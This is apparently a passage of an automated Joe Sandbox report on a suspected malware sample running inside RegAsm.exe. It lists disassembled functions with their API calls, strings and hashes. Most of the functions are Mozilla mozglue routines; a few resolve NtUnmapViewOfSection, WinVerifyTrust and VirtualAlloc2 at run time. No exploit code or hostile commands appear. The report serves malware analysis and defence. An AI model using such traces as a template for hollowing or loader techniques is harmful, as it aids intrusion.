Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 4b5d3af81fe58d947985054a5ba1a6bf05bd990ae0ff51fd9f7fc6962ecc0244
Instruction ID: 7cf8cde5f7a7053dd6c8fb995a5155be4ee99360961747652cd965f32ad6d3d4
Opcode Fuzzy Hash: 4b5d3af81fe58d947985054a5ba1a6bf05bd990ae0ff51fd9f7fc6962ecc0244
Instruction Fuzzy Hash: 68E0B672704311ABEF006FA3C859721BAF8EB07219F108026F915D5A00EBB48055FF50

Function 6C147600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C147592), ref: 6C147608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C147627
FreeLibrary.KERNEL32(?,6C147592), ref: 6C14763C

Strings

NtUnmapViewOfSection, xrefs: 6C147621
ntdll.dll, xrefs: 6C147603

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 70edc0806ab9466ff8fe3027e7712d16776c2fc24ba2310777d8b7043fbb469d
Instruction ID: 4d4e229805260c7e218bbf7d9ef6a35583f7f45c03c400a1a0aa9c185e819569
Opcode Fuzzy Hash: 70edc0806ab9466ff8fe3027e7712d16776c2fc24ba2310777d8b7043fbb469d
Instruction Fuzzy Hash: 61E0B6B5700301ABEF006FA7C808721BAB9E72A35AF00D126E915D2B00E7B4C015FF58

Function 6C14C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C14C1DE,?,00000000,?,00000000,?,6C0F779F), ref: 6C14C1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C14C217
FreeLibrary.KERNEL32(?,6C14C1DE,?,00000000,?,00000000,?,6C0F779F), ref: 6C14C22C

Strings

wintrust.dll, xrefs: 6C14C1F3
WinVerifyTrust, xrefs: 6C14C211

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 7351b3e18e6191fd34cac3c6b66cd717885bcd22cff0c7bccb49a0b2a4617a36
Instruction ID: 4b09dd20521b04f4d701a5e36a2b2ad9067689de564286d119faaf7593f43460
Opcode Fuzzy Hash: 7351b3e18e6191fd34cac3c6b66cd717885bcd22cff0c7bccb49a0b2a4617a36
Instruction Fuzzy Hash: 06E0B6B57013419BDF00BF63C918B227EFCBB56208F004555A924C1B91E7B08024BB51

Function 6C14C240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F77F6), ref: 6C14C248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C14C267
FreeLibrary.KERNEL32(?,6C0F77F6), ref: 6C14C27C

Strings

wintrust.dll, xrefs: 6C14C243
CryptCATAdminAcquireContext, xrefs: 6C14C261

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: aae85e47d49fa5379e59a8794c2114f6f343e1908d60bbf4aef9300079bd0028
Instruction ID: 0ca09fe5c3a4a4214b811ffc05d29e3f33efa15fe86cf1f3486b876cb90f5d6d
Opcode Fuzzy Hash: aae85e47d49fa5379e59a8794c2114f6f343e1908d60bbf4aef9300079bd0028
Instruction Fuzzy Hash: C4E092746042059BDF04AF63E818B227AFCA70B308F114295F934C2701E7B08064BB60

Function 6C14C290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F77C5), ref: 6C14C298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C14C2B7
FreeLibrary.KERNEL32(?,6C0F77C5), ref: 6C14C2CC

Strings

wintrust.dll, xrefs: 6C14C293
CryptCATAdminCalcHashFromFileHandle, xrefs: 6C14C2B1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: d81e2dd9fee2a03fe4912ebc75c2435713786ee7589c6eb31b07f207ec3876a8
Instruction ID: acde26ba778eb9ed93e94fb3398da250ff75c53f2bfc21b937d2008ba778bcd4
Opcode Fuzzy Hash: d81e2dd9fee2a03fe4912ebc75c2435713786ee7589c6eb31b07f207ec3876a8
Instruction Fuzzy Hash: 5CE092746412019FDF006B6BC918B227AFCFB16208F544455AD2481B10EBB18028EB50

Function 6C14BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6C0F05BC), ref: 6C14BAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C14BAD7
FreeLibrary.KERNEL32(?,6C0F05BC), ref: 6C14BAEC

Strings

kernelbase.dll, xrefs: 6C14BAB3
VirtualAlloc2, xrefs: 6C14BAD1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: fa0a6976cb6bf4c0a75ad14f6275771ca64e958b6953adc4b71b4bbf68a532b5
Instruction ID: d805fcd0e7a1f9b897b93b59162d5e6920ec71e5fe32538da22fed2b7104a912
Opcode Fuzzy Hash: fa0a6976cb6bf4c0a75ad14f6275771ca64e958b6953adc4b71b4bbf68a532b5
Instruction Fuzzy Hash: ABE0B6703053829BDF409F63C92C7257BFCA746208F24405AB91581B44EBB88074BB10

Function 6C14BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C14BE49), ref: 6C14BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C14BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C14BE49), ref: 6C14BF38
RtlReAllocateHeap.NTDLL ref: 6C14BF83
RtlFreeHeap.NTDLL ref: 6C14BFA6

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 9f93ba8e7bc44d39778624ea60a597fa647cf52034f086a0f6f857c6c4cb3c16
Instruction ID: 1c2ac6c81443e3a9c29e88f3a11f6951cbd55dd914f51ebc311538799cb283dc
Opcode Fuzzy Hash: 9f93ba8e7bc44d39778624ea60a597fa647cf52034f086a0f6f857c6c4cb3c16
Instruction Fuzzy Hash: 29519F71A006058FE710CF69CD80BAEB3A2FF98314F298679D519A7B54D734F9068F80

Function 6C138E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?,6C15D734), ref: 6C138E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?,6C15D734), ref: 6C138EBF
free.MOZGLUE(?,?,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?), ref: 6C138F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?,6C15D734), ref: 6C138F46
free.MOZGLUE(?,?,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?), ref: 6C138F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?), ref: 6C138F8F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 27748e113ddae51e2ef03862cd677f5425aa3ee50b1ecf0c2e4fd4db4f1926a4
Instruction ID: c8e963c873e7b458c1978f47249b41c8a5453618be798ba9051584dd7423da0b
Opcode Fuzzy Hash: 27748e113ddae51e2ef03862cd677f5425aa3ee50b1ecf0c2e4fd4db4f1926a4
Instruction Fuzzy Hash: 57518EB5A012268FFB14CF68D88076EB7B6AF44318F25056AD91AEB740E731F905CB91

Function 6C0F60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F60F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F6180
free.MOZGLUE(?,?,?,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0F6211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F6229
free.MOZGLUE(?,?,?,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0F625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0F6271

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 2400fd7055df3e76df9f7c6262d9f47109bae417983fc7a92b39b5fb7fa61e53
Instruction ID: 5b92838a57b15497da0436ece1b90b0671d5ebe1146a08619836088d8f38518b
Opcode Fuzzy Hash: 2400fd7055df3e76df9f7c6262d9f47109bae417983fc7a92b39b5fb7fa61e53
Instruction Fuzzy Hash: 2F518BB1A006068FEB14CFA8D8907AEB7F5FF49308F140539CA66D7701E731A996CB51

Function 6C1327E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C13284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C13289A
free.MOZGLUE(?,?,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C1328F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C132910
free.MOZGLUE(00000001,?,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C13293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C13294E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 9010e143bfceb5250b73714b9022bfc8063c0f69f52b0fab360cfcf30f3bb17c
Instruction ID: 430c89b23d6eabef7163650bed126d3debf54d7edfd3e962bb6a3aa2e738ebeb
Opcode Fuzzy Hash: 9010e143bfceb5250b73714b9022bfc8063c0f69f52b0fab360cfcf30f3bb17c
Instruction Fuzzy Hash: AE41D4B1B002268FEB20DF68D89476A73F5EF45318F150539DA5AEB741E731E904CB91

Function 6C0ECFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0ECFF6
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0ED026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C0ED06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C0ED139

Strings

MOZ_CRASH(), xrefs: 6C0ED187

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: b0918743ca1f804fd28c11df763b9293e5fd097b54e12fb6ba8f8ed81b518fd7
Instruction ID: 9f36b5763d384ff7a8d962178dbe6a38fc3cb4858bc39f57bfc1675c721fc85e
Opcode Fuzzy Hash: b0918743ca1f804fd28c11df763b9293e5fd097b54e12fb6ba8f8ed81b518fd7
Instruction Fuzzy Hash: 1E41CE32B413165FCB048EAE8D9437AB6F4EF89714F140239EA18E7784D7B19D01ABC0

Function 6C0E4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0E4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0E4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0E4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C0E4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C0E4F1E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 17cf91ad55a9af7d755b1bcd39f605ad621ff956424f19cd1bb7299d8feacc74
Instruction ID: bc074cb65226c21aa7eac72c028f5eaf19ee9244dff968e7784a49add5616fa6
Opcode Fuzzy Hash: 17cf91ad55a9af7d755b1bcd39f605ad621ff956424f19cd1bb7299d8feacc74
Instruction Fuzzy Hash: DF41CE71648705AFC705CFA9C880A5BBBE4BF8D344F108A2DF96687B41DB30E958CB91

Function 6C12D210 Relevance: 7.6, APIs: 5, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C0F5820,?), ref: 6C12D21F
moz_xmalloc.MOZGLUE(00000001,?,?,6C0F5820,?), ref: 6C12D22E

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6C0F5820,?), ref: 6C12D242
free.MOZGLUE(00000000,?,?,?,?,?,?,6C0F5820,?), ref: 6C12D253

Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6C0F5820,?), ref: 6C12D280

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID:
API String ID: 2029485308-0
Opcode ID: 02261ff99036f1de4b3ccf76f77fd06708d40707041b133bf500d7b4dd3c1c87
Instruction ID: ebccaee4d31c191528a2bd008ed9105a34c61fa4af373ba02f3871008211bc7b
Opcode Fuzzy Hash: 02261ff99036f1de4b3ccf76f77fd06708d40707041b133bf500d7b4dd3c1c87
Instruction Fuzzy Hash: 0E3128B9A012158FCB00DF58C880BAEBBB5FF99308F244069D954AB701D376EC56CBE1

Function 6C0FC150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0FC1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0FC1DC

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: 12b1a6f2150e3bbbce49d3c427f1d472227383de7e2bafc42bddd2644dce7fbf
Instruction ID: 0b067e18d920b26dd759ee5adcfa55503d3b177775e9e35646b33721a277b7b7
Opcode Fuzzy Hash: 12b1a6f2150e3bbbce49d3c427f1d472227383de7e2bafc42bddd2644dce7fbf
Instruction Fuzzy Hash: AD4190B19083408FD720DF64C48179AB7E4FF8A708F40856EE9985B712E7319599CB92

Function 6C14A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16F770), ref: 6C14A858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14A87B

Part of subcall function 6C14A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C14A88F,00000000), ref: 6C14A9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C14A8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14A90C
LeaveCriticalSection.KERNEL32(6C16F770), ref: 6C14A97E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 65c71823f45066996f6d0fc185bf32ae277e92abec2fe8e36d6a564dbe056e0a
Instruction ID: 26ce85855d638acf5cdb9ba559556a5a530718a898c5d7e3a80a97270d9315ce
Opcode Fuzzy Hash: 65c71823f45066996f6d0fc185bf32ae277e92abec2fe8e36d6a564dbe056e0a
Instruction Fuzzy Hash: FD41A1B4E002089FDB00DFA4D845BEEB775FF08324F118629E826AB791D731D955CB91

Function 6C0F1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F15BC
moz_xmalloc.MOZGLUE(-00000001,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F15E7
free.MOZGLUE(?,?,?,?,?,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F1637

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 82cbe475f1262dc31a53703b2d99b508ec1f3cbee215fee21d4ffd564e7b1afb
Instruction ID: ba83f52bb53508cd9a1d6dc22f37926aa692fefb2eefe99ec56b956a4fec10b4
Opcode Fuzzy Hash: 82cbe475f1262dc31a53703b2d99b508ec1f3cbee215fee21d4ffd564e7b1afb
Instruction Fuzzy Hash: 933128B1A001048BC7188F78D85066E77E9AB857647280B2CEC33DBBD4EB30D9468791

Function 6C0E4310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,6C0E42D2), ref: 6C0E436A

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0E42D2), ref: 6C0E4387
moz_xmalloc.MOZGLUE(80000023,?,6C0E42D2), ref: 6C0E43B7
free.MOZGLUE(00000000,?,6C0E42D2), ref: 6C0E43EF
